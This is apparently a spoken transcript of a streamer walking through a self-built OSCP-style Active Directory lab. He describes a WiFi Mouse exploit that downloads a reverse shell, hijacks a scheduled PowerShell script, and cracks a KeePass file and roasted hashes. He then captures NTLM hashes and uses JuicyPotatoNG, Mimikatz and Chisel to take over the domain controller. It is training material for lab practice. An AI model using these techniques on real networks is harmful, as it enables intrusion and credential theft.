All right, welcome back. So I just finished making an OSCP like AD machine. It's got two machines to it: the domain controller and then the MS01 machine. So a lot of things you'll see like MS01, MS02, with then like a domain controller or something like that. I just put a lot of stuff in MS01. There's about 1,000 different ways to get into this machine, but um, we're just going to go through one of those ways that we can get through this guy and look at the whole thing and see what we can do with it. So let's go ahead and get this thing a start. All right. The IP address. Let me go ahead and grab the IP address like real quick because I already forgot it. All right. We're going to go a quick rust scan on it for 0.29. That's going to be the network that we're on. Hey, thanks a lot. All right, so we get quite a few ports open here, right? Doesn't look like anything from the web or anything like that. But we do get a weird port 1978. So let's go ahead and start looking at that. Let's go into mmap tac p 1978. That 192.168.0.29. What's up, Dinor? How you doing? We'll see if we can get anything with that. And something I noticed when I was going through the different machines is always try to just find an exploit for that port number also, if your stuff doesn't freeze. All right, so if we go ahead and we look up, let's see here, port 1978 exploit. As you can see, I've looked it up before. Okay, we see a couple things here, right? We got this remote mouse and then Wi-Fi mouse. Okay, and this is on port 1978. So let's go ahead and grab that Wi-Fi mouse one. My machine's kind of freezing like a little bit because I got so much RAM on the other machines also. All right, this guy's still trying to figure out what that port is like right there. We'll grab this Wi-Fi mouse and let's go ahead and let's see if we can do anything with this. And I'm going to go ahead and I'm going to restart the machine real quick on my side because I think I'm logged in as someone that should be logged in as. So I'm just going to go ahead and I'm going to restart the machine. I'm going to grab this. And let's see what this thing actually came up with. So it doesn't actually know. UniSQL. All right, it doesn't actually know what it is. That's why I always look up the port. Okay, so if there's anything that's like a weird port, something like that, always look that up. So let's go ahead and let's do a sublime exploit.py. Right, go ahead and delete that whole thing. Go ahead and we'll control S there. Actually, let's go ahead and get rid of all this stuff. We'll close all files. All right, and then we'll go ahead and we'll look back at that again. That sublime exploit.py, and there we go. So we have this now. Let's go ahead and let me see if that machine has started back up yet. It has. Okay, let's go ahead and throw another rust scan on it just to make sure. All right, looks good. So let's go ahead and this is a Python 2 exploit. So we'll do exploit.py and let's make a MSF Venom file for shell.exe because if we actually look at the exploit, right, we need a payload name. So we need something to call back to, right? So we're going to have shell.exe and we're just going to make that a Windows x64 shell reverse TCP, my L host, my L port that we'll list it on, and then we'll just call it shell.exe. So let's go ahead and also start up this, and we can also see like right here that we need a local HTTP server IP. So let's go ahead and do a Python 3 port 80, and we'll try to call for this. And sometimes you have to call for it a couple times, but we'll see that it retrieves it, but we don't get anything back up here. So let's go ahead, let's take a look at that file again and see what's happening here. So we go through, we can see that it's sending strings, cert util, okay, cool. And it's downloading from me, and that is downloading the payload, and that's going to see Windows temp. That could be a problem like right there. If we don't have write permissions on that folder, we may never actually be downloading it. It may try to download it, but we may be getting access denied. So let's go ahead and let's kind of change this up like a little bit. Let's send string, and we'll say make directory ctemp. And we should be able to do something like this. And then we'll send return. And then we'll come down here and we'll delete everything that's C Windows temp. And we'll just make it just C temp. Let's go ahead and save that now. And let's see if we can't run that again and if we get anything back. And we do. Cool. So who am I? I am currently TwiddlyD. Okay, who am I / all. Okay, no cool privileges down here. He seems just like a regular user, right? Built-in user account. Okay, so we have a regular user now, right? So let's go ahead and cd into C users. TwiddlyD. Oh. Who am I again? Oh, I'm MS01 TwiddlyD, that's why. I'm going to cd into there. All right, and we have, once we get here, we see this list print jobs.ps1. Let's go ahead and type that out. And this looks like it's just listing some print jobs, right? Well, if it's trying to list print jobs, it's probably running on a scheduled task, right? Wouldn't be very good to list print jobs and have to sit there and do that every single time. So let's go ahead and let's take a look at if this is running on a scheduled task or not, and if we can mess with it, right? Hey, thanks a lot for the follow, Akshay. Thank you very much. All right, so let's go ahead and rename this file. We never want to delete something, right? So let's rename it if we can. If we have to delete it, then we have to delete it, but we should always copy whatever's in there first. So let's go ahead and rename this to list print jobs.ps1.back. Let's also hop over to PowerShell. And let's go ahead and copy invoke PowerShell TCP.ps1 over to myself, right? So if I sublime this guy, we'll scroll all the way down and we'll have it run 192.168.0.24, my IP address, right? And we'll have it run a reverse connection back to us. We'll save that. And let's go ahead and throw this up and over into here. Let's do a wget. And we'll throw that in there. Now remember, we do want to name it now that listprintjobs.ps1. So our out file is going to be listprintjobs.ps1. All right, so we got him. So if I do a dir now, we can see that we do have listprintjobs.ps1. Let's go ahead and do an rl wrap. And let's go ahead and type that out just to make sure that it actually came through properly. And it looks like it did. Okay, and we immediately get a callback actually. It shouldn't take any more than a minute. So when we immediately get a callback. Hey, thanks a lot, Typhoid Meredith. Thank you very much. Also, thanks for the follow. All right, let's do a who am I / all now. Or who am I, excuse me. And we see that I'm admin. All right, cool. So now the admin. Okay. Now from here, let's go ahead and cd to C drive again. Do a dir. Okay, we'll cd into users. And we'll cd into admin. All right. Oh, I didn't delete some of the stuff that I had in here before, so let's go ahead and delete all that. Because obviously I tried this box beforehand. We'll delete all this stuff. This is the above and beyond part, actually. Let me go ahead and delete that. We'll delete that. All right, we'll do a dir. Okay, let's go ahead and cd to desktop. And we see that, hey, thanks a lot for the subscription, Typhoid Meredith. Thank you very much. All right, we see that we got a root.txt, and we also have a database in here. Now, most of the time, like I said, there's more than one machine, right? So you won't continue to just kind of laterally move. You'll move up, and then you'll move up again, right? You'll do things like that, right? Maybe with Juicy Potato or UAC bypasses, just things like that, right? You usually don't laterally move like this, or an executable that you can mess with, right, that's being ran, or a PowerShell script that's being ran, or something like that. So we have this database now. So we need to get that back to ourselves, right? So let's go ahead and start up an SMB server, and we'll copy that database back to ourselves. And I always forget which way the little slashes go. Yep, I was right. 192.168.0.24/share. Because I started up a share up here, right? So I have that share started. We'll enter. We copied it back to ourselves. Awesome. We also get the admin's hash like right here. We could try crack. This one like right here, you're not going to be cracking it, but you could try. It starts in about 6 hours. Can you drop a link for it? Kickflip by cat. There's a CTF that starts in about 6 hours. I'll be sleeping by that time, but I mean, I'll obviously be up tomorrow morning. Gotta go to the beach though with my son. We're gonna go to the beach. It's got this big pirate ship like playground thing plus the beach, so it's pretty cool. All right. So we do get his hash back though, so we could try to crack that, right? But we also get this key pass. Okay. Now this key pass file, I did pick a password that was farther down the list, and the reason I did that was so you had to kind of use Hashcat. You can use John the Ripper, but I want to show you guys how to use Hashcat for something like this, right? So let's go ahead and do a key pass to John, and we'll throw that in the hash.text. Now what we need to do is we need to nano that hash.text or sublime text, whatever you use. We need to get rid of database. Hey, thanks a lot, Cosmin, for the file. Okay, we need to get rid of database. We can now use this with crackmap.exec, or with, Hashcat. Okay, so we can do a hashcat tech m. Key pass file is 13,400, I believe it is. Hash.text, user share wordless rocky.text. Oh, we've already cracked this one. So, but it should take, can I actually get the hashcat pop file? I can. Can I delete this? Just like I kind of do with John the Ripper, or did I just break my hashcat? Nope, you can. Okay, cool. So this is going to take about a minute to crack. A minute or two or something like that, okay? But I want to pick one that was farther down just to make it more, I guess, realistic, I guess. But if it takes any longer than 5 minutes, then you're wrong, okay? Yeah, I'll message you, Kickflip. Once I sign up for it, once I'm done with this video, I'll go through and I'll do everything. Are you on Discord, or you just want me to message you on Twitch? And that's if I get out at all. So I may not get out at all because my family does come back tomorrow. So, okay. All right, still going. Like I said, it's going to take a couple minutes or so to crack this hash. While that's actually going, what we could do is, since we do have admin down here, right? We could do a whoami/all. And let's go ahead and become NT system, right? We could do that. So let's go ahead and cd into tools. Now I do have this cool like little script. It's called invoke tools. All right, I'm not going to run that on this because I'm already administrator, and it does go through and does. Actually, no, we'll run it. We'll run it. So let's go ahead and then we'll grep for invoke tool. Okay, that actually just cracked up there. All right, so let's go ahead and we'll run this. Now, invoke tools, what that's going to do is it's going to, hey, thanks a lot for subscribing on YouTube. What invoke tools is going to do is it's going to drop in a bunch of files. So if I sublime that invoke tools, okay, we can see that all this is doing is just doing a wget for a bunch of stuff, throwing a couple things into memory, and then running mimikatz, and then running invoke all checks. All right, so we're throwing in chisel, we're throwing in Legolo, print spoofer, WinPZeny, and juicy potato ng. So really, you know, whichever versions you like of stuff. So we can run that with, we can put that in the memory, right? So Python 3 server, 192.168, excuse me, HTTP, 192.168.024 / invoke tools.ps1. Now, if you don't have those tools, oh, I got to do a use basic parsing. As we can see, Internet Explorer's first launch configuration not complete, so we got to do a use basic parsing, and there we go. All right, now if you are wondering where to find those tools, on that same GitHub page, so if I open up my GitHub here, for invoke tools here, if I go to repositories, invoke tools, you can run this bash script right here, and that'll download all the tools into a tools folder, which then you just need to start a web server on. So now we have this. Go ahead and do an invoke tools, tech lhost, 192.168.024. Okay, that should be everything that I need. And we'll go ahead and we'll make sure that Python server started back up again. As you can see, it starts to grab everything, starts to bring it over in here. It also makes a temp directory. So it's going to try to make a ctemp that obviously already exists on this machine because we already made one for our last exploit that we just did. Now it is going to run a couple commands. That's going to take a minute on here because we are already administrator. So we're going to get a lot of crap. And like I said, there is 100 different ways to be able to move throughout this Active Directory domain. But I'm just going to show you the way that I guess is intended, we'll say, or the way that's going to teach you the most. Weasel, how you doing? Good evening. So this is going to take a minute because I'm an administrator. So it's running all those checks and everything like that and running Mimikat stuff. So that's why it's going to take like a little bit. But while this is also running, what we could do is we can go ahead and start up actually another something else on port 443. We'll see if that we get that callback again from this PowerShell script that's ran every minute. If we get our callback, then what we can do is we can start up Chisel and continue working throughout this network. And we did also, remember, get that key pass, right? So while that's right down there, we'll go ahead and we'll look at this key pass up here. And we see that the password is Liverpool08. So let's go ahead and do a key pass. And we'll put in, we'll make sure that we get the correct database, open database, database.kdbx, okay? Yep, that's correct. And we'll do Liverpool08. And we'll click unlock. Okay, this was in general, it looks like. So it looks like we do have someone in here called Twiddledum. So we have Twiddledee and Twiddledum. And his password is supersecret321. Okay, let's go ahead and see what he's able to do. So now we need Chisel on here or something like that to be able to move throughout this network, right? Still haven't got anything back over here. This guy's still trying to do its thing. I might have broken him actually, just with the crap that's running in here. So we may have to get back into this guy. But we do at least have a username and password now. Don't know how much we're going to be able to do with it, but we at least have something, right? And I wonder if I can actually put Chisel up here. If we can actually get Chisel running up here. Let's go ahead and try that like real quick. Go ahead and stop that. Let's go ahead and look at my notes like real quick, just so I don't have to. There we go. Okay, get Chisel, right? And then we have chisel.exe. Let's go ahead and try that over here. Don't know if it's going to work since we're not administrator. Never really tried it not being administrator, but should work. Let's go ahead and try that. Oh, we got kicked out. Oh, this thing kicked us out, huh? All right, let's go ahead and hop back into here. All right, since we already got to admin, we're just going to go ahead and we're just going to even with our admin with admin. Okay, that's his password link right there. Just so we don't have to go through everything all over again. Is the machine still up and running? Or did it die? Nope, it's still up and running. Okay, it just kicked us out from all the crap that was probably running from up here. So let's go ahead and CD to ctemp. That shouldn't happen regularly, just so you know. Okay, so we're back in as admin, right? I'm not going to do anything special with even with our app since you most likely would not have been able to get in this way. So we pretty much just have a regular shell that we had before, we'll just say. All right. Actually, let's go ahead and do a whoami/all. We'll get an NT system authority shell. Okay, so we have impersonate client, right? So let's go ahead and run that. We'll go into Windows here, right? And we'll look at exploits. And we'll grab that juicy potato ng. And it also does grab that NC64 file, that invoke tools. So we're good with that. That's 0.24. Port 445. Let's go to RL wrap for port 445. All right. Period / juicy potato ng. Let's see if that works. Who am I? And we are NT authority system. Let's go ahead and do a PowerShell. And we'll cd to ctemp. And let's go ahead and get that that chisel up and running, right? We go ahead and exit off here now. Oh, whoops, we cannot. Whoopsie daisy. Didn't like that at all. It's because there's thinks that there's a space in it. There we go. Oh, what happened there? Juicy potato ng. Oh, period slash. That's why. I'm sitting here like, what are you talking about? There we go. Okay. Well, we actually did get a call back down here finally. Took a minute, but we got a call back. And we're admin again, so we do get that call back again. Hey, Kickflip My Cat. Thanks a lot for the Prime subscription. Thank you very much. All right. Now we're in here. We have, let's review what we have so far, right? We have NT System Authority on this machine. We have a key pass for Twiddledum, right? And his password. And now we're about to get Chisel working, right? So let's go with cd to ctemp. And we already have a Chisel server listening, right? So let's go ahead and throw this onto there. We can exit off here or clear that like real quick. So we have somewhere to type. We'll say 0.24. All right, cool. So now we have a Chisel session, everything else open, right? Let's go ahead and we can just bring all this up so we don't have to look at it, right? So now we can go ahead and try to figure out what the internal network is, right? If we do an IP config, we can see that it's 10.10.10.0, right? /24, right? 255.255.250 there. So let's go ahead and do a crackmap exec, SMB, 10.10.10.0/24, TAC U. We had Twiddledum. We know that password, right? TAC P, and we'll say super secret 321. Let's just hit enter there. Oh, that's not going to work because we need our proxy chains, huh? Proxy chains. There we go. All right. So we know that there is 10.10.10.48, which that looks like the domain control link right there, actually. We could check that with an mmap on 10.10.10.48. And I need proxy chains. And that is. Okay, so that is the domain control link right there. So he can do something on it with SMB. He can't log in. It's not pawned. He can't log in with it. But he can definitely do something. So let's go ahead and check out those shares then. And what we'll do is we'll go ahead and we'll actually make a 10.10.10. We have 51, right? 51 and 48. 51. And we'll put that into internal.txt. So if I cat that internal.txt like right now, there we go, okay. And then we'll also go ahead and we'll throw 48 into there. And we'll use crackmap exec. And this time we'll do internal.txt so we don't see so much crap, right? Proxy chains. All right, cool. Now let's go ahead and do a tac share. Oh, okay. On 10.10.10.48, he can read the user share. Let's go ahead and take a look at that like real quick then. So we'll go ahead and we'll look at that user share with XMB client. We have users, Twiddledum. put in his password. All right, dir. It looks like we have a users, right? We have some users here, okay? And we see that we have this IIS service user, okay? Can we CD in anything, actually? We cannot, okay? So we can't get anywhere. We see an IIS service user. Let's go ahead and see if that IIS service user, either A, hey, we could use get user SPN, or if we could use the get IP users, right? So we'll say, hey, I want to do a get IP users on terminal.local for I. Let's actually try get user SPNs first. And we'll do this for twiddledee, or twiddledum, excuse me. And that's super secret 321, 321, right? Let's see if that works, if we can log in with that. We cannot. Okay. Let's go ahead and try a get IP users. And see if IIS service has no pass, right? There's the make sure IP. And we'll go ahead and we'll just do a request just in case. And we do get something back. All right, cool. Let's go ahead and grab this. Echo that into hash.text. We'll say John hash.text fork equals 4. And we get back welcome 1. All right, sweet. So let's go ahead and now see if we can't get into this IIS service or what he can do. All right, we'll try the crack map exec again. This time with IIS service and welcome 1. And let's go ahead. Okay, it's already on internal.text. Let's see what he can do. All right, so he can get into a couple places. Nothing's pawned, but he can see some shares. And he sees that we can read share out here. Okay, let's go ahead and read that share then. Let's go ahead and proxy chains SMB client. Share. IIS service. Welcome 1. All right, we have the share.ps1. Let's go ahead and type out that share.ps1. Or get share.ps1, excuse me. Okay, we'll go ahead and we'll cat that. And we can see that it's running net view. That's strange. All right, so if it's running net view, then obviously it's looking for a share on 10.10.10.51. So let's go ahead and head back over into 10.10.10.51 then. And let's start up Inve, right? So I can either RL wrap 443, sit there and wait for it, whatever else, okay? Since we already have something up and right over here, and technically you could have done invoke mimikatz and all that stuff by now, but let's go ahead and let's see. Let's go ahead and upload Invade here. So wget HTTP. Let's say use basic parsing. Actually, there we go. We'll do it over here. Said supposedly you don't know the password. So we'll cd to c temp. Okay, we'll do a wget. Use basic parsing. HTTP. 192.168.0.24/env.ps1. Tac O env.ps1. If you don't know what env is, am I not in tools like right now? Or what we got going on over here? Yeah, I'm in tools. Oh, because it's env.exe, that's why. Okay, cool. We got that now, right? So it appears /env, and I actually have no idea if this is going to work or not. I've only ever done this with remote desktop, so I have no clue if this is going to work or not. I don't know if we're going to get a view back. I don't know what we're going to see. But it doesn't look like anything's happening like right now. At least it doesn't look like it. What we could do actually is see if we actually And we can say twiddledum with the password of can get into anything in internal.txt with RDP. We're going to have to proxy change that. It doesn't look like it. All right, so we have this invade running, right? We can start up another RL wrap or whatever else. Like I said, I have no idea if this is actually going to work or not. Let's go ahead and do a dir like real quick. And something is working. Something is happening here. Okay, we get this invade ntlm v2.txt. Let's go ahead and type that out. And we have a hash. So it looks like that this user caret is running that netview file, which is calling back over to this machine. Invade is a responder type, works like responder, but it's used for Windows. I do have a video on it. All right, so we do get a hash back. So let's go ahead and grab this hash and try to crack that. And we get the password for the user caret. So let's go ahead and now let's run crackmap exec, proxy chains, crackmap exec, right? And we'll try caret. We'll do our internal.txt here. Get rid of shares. We'll enter here, and he has pawned everything. So he can obviously get into the domain controller. So let's go ahead and proxy chains evil winrm. Tac I 10 10 10 48. Tac U caret. Tac P. And there we go. What's up, Oreo Bite? Aren't you at DEF CON like right now? All right, CD and C users, CD and the caret. Did I really name it find.txt? Oh, that's because that's old. That's why. CD and desktop. And we can go ahead and type out that root.txt. And there we go. Okay, soon. Okay. And there we are. So that is the whole thing. Both machines. Like I said, MS1 has a lot of stuff happening on it. There's a lot of different things going on there and stuff. But that is a lot of different things that I saw while studying for the OSCP and also while utilizing Active Directory module, things like that for Hack the Box and stuff. Just a lot of stuff just, kind of crammed in together. Now, what else can we do, right? We had that admin, right? So let's go ahead and why don't we try a secrets dump on, it's called internal.local. Admin, right? But we don't know what his password is, but we should be able to use a hash, right? So let's go ahead and actually stop that. We could try to get it again through this, but we're already over here. So let's go ahead and use this over here, right? Let's go ahead and do an IEX. Oh, we're in. Never mind. Every time I say that, we get in. Let's go ahead and do an IEX, IWR, use basic parsing. Invoke Mimikatz. Because whenever you become an admin, you always want invoke Mimikatz, and you always want to run crap exec again. Let's do an invoke Mimikatz. LSA dump LSA / patch. We'll say Ursula log on passwords / full. Then we'll also say vault cred just in case there's anything in there. It shouldn't really take too long to do this. Now, I haven't really tried any other attacks on here, just so everyone knows. We can also try to upload Mimikatz into here. So we could always do a wget. We could also do something like that too. Okay. And hopefully not get kicked out like we just did. But, ooh, actually, we're not getting much in here at all, are we? Really thought we'd get something here. Oh, this thing kind of like died on us now, didn't it? Oh, the whole box died? No, box still up and running. Just saying, hey, you're done. I guess saying let everyone else do what they do. Let other people try. I guess it's just saying that, huh? Well, we'll go ahead and we'll throw in the password like real quick. See if we can do a secrets dub. Because usually you'd already have a password by this point. Oh yeah, this guy does not want us on like right now. Also, that admin was not actually internal, not local. That was just a slash. So that's another thing also. But yeah, it does not want us on like right now, does it? It's saying get out. There we go. We can also do an upload since we do have WinRM like right now. So you guys know that's how you upload things whenever it's not in the same folder that you're in. Just do a whole bunch of backslashes. That's all. So you guys know whenever you're on even WinRM there. You try that. It might, yep, I'm about to say it might go insane. If it does that, that's because it wants to be ran under a command prompt, not under PowerShell, just so you know. So sometimes that will happen. So if that's the case, you can go to command prompt. Although this thing does not want to do anything anymore. So I guess that's going to be it for me on that one. But that is how to get through those two machines like right there. I'm going to throw them both up on Vagrant. It might take me a couple days to get them up there. But I'm going to throw both of the machines up on Vagrant. All right, and we'll have the administrator password for both of them. So in case you want to change the IP addresses, to be able to create a different internal network or something like that. But you do need to create an internal network on VirtualBox for it to work. Okay, but I'll throw the passwords on there and things like that. Just 2 boxes that I made, Jerv, to show OSCP-like boxes. All right, thanks a lot for watching, and I'll talk to you all later.